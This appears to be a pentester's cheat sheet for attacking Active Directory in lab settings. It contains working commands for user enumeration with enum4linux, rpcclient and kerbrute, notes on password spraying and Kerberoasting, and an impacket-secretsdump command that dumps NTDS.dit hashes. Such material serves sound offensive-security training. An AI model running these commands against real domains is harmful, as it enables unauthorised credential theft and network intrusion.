# Active Directory ## Attack Workflow Determine what ports are open Enumerate with * [ ] Determine open ports * [ ] Scan ports with Nmap to fingerprint * [ ] Enumerate AD information * [ ] Domain info * [ ] rpcclient * [ ] enum4linux * [ ] Get list of users * [ ] If list not available, bruteforce usernames * [ ] Determine if kerberos pre-auth exists * [ ] Determine which users have SPNs (Service Principle Names) ## enum4linux Used to enumerate a huge amount of AD information from the command line. ```bash enum4linux -a 10.1.1.10 # Attempts to enumerate everything at target enum4linux -u administrator -p password -U 10.1.1.10 # Use stolen creds to enumerate all users enum4linux -S 10.1.1.10 # Attempt to gather SMB shares ``` ## rpcclient Used to enumerate information about system over RPC Gather a list of accounts with `rpcclient` and save ``` rpcclient -U 'GOBLINS\printerldap%SecurePassword1' 10.0.0.1 -c 'enumdomusers;exit' | awk -F '[' '{print $2}' | awk -F ']' '{print $1}' > goblinUsers.txt ``` ## Password Spraying Using a tool such as Talon can run password spray attacks across an AD env ## Kerberos Kerbrute, used to run various kerberos attacks. Written in Go. ```bash ./kerbrute_linux_amd64 userenum --dc 10.10.107.154 -d spookysec.local ../userlist.txt ``` ## Kerberoasting Using a valid account on a pwned box, we can gather tickets for service accounts and extract the hash to crack. We must find all accounts in AD which have a SPN (Service Principle Name), then request RC4 tickets from the DC. ## secretsdump Used to extract hashes from a server. Below command will get NTDS.dit, assuming that you have an account with those permissions. ```bash impacket-secretsdump -just-dc backup:backup2517860@10.10.107.154 ``` ![AD Detailed Mind Map](https://15634114-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MUBcWDIntFMCfIaMka5%2Fuploads%2F7E3kA4T4bA6RbkRYL8sX%2Fpentest_ad_black.png?alt=media\&token=636dffbf-b1ac-44a7-b39f-080122e114bc)